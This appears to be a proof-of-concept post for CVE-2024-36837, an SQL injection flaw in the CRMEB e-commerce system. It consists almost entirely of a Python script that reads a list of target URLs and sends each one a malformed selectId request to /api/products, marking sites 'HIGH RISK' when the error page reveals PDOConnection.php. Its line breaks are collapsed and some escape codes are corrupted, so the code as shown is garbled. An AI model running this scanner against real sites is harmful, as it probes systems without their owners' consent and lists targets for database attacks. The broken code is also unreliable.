CVE-2024-36837｜CRMEB电商管理系统存在SQL 注入漏洞（POC）

import requestsdef check_vulnerability(url):    # Remove trailing slash if present    if url.endswith('/'):        url = url[:-1]    # Construct the URL with the required endpoint    test_url = f"{url}/api/products?limit=20&priceOrder=&salesOrder=&selectId=)"    try:        response = requests.get(test_url)        # Check if the response contains the specific string indicating a vulnerability        if 'PDOConnection.php' in response.text:            print(f"�33[31m[HIGH RISK]�33[0m Vulnerability found in: {url}")        else:            print(f"�33[32m[SAFE]�33[0m No vulnerability found in: {url}")    except requests.RequestException as e:        print(f"�33[33m[ERROR]�33[0m Could not connect to {url}. ")#Error: {e}")def main():    # Read URLs from url.txt    with open('url.txt', 'r') as file:        urls = file.readlines()
    for url in urls:        url = url.strip()  # Remove any leading/trailing whitespace characters        if not url.startswith('http'):            url = 'http://' + url  # Add http scheme if missing        check_vulnerability(url)if __name__ == "__main__":    main()